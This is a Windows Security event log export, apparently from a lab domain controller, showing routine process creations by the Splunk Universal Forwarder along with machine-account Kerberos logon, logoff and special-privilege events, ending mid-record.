SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263546
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7202DB
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:11:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263550
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1924
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263549
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263551
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x197c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263552
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x165c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263553
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263555
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x106c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263554
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa80
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263557
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7231FE
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59827
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:11:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263556
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7231FE
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:11:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263558
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7231FE
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:11:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263561
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x723FD7
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:11:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263560
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x723FD7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59836
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:11:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263559
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x723FD7
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:12:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263562
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1288
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263564
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1704
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263563
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19d8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263565
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1564
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263566
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1804
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263568
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x155c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263567
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263574
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x726EE7
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:12:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263573
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x726EE7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59843
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:12:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263572
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
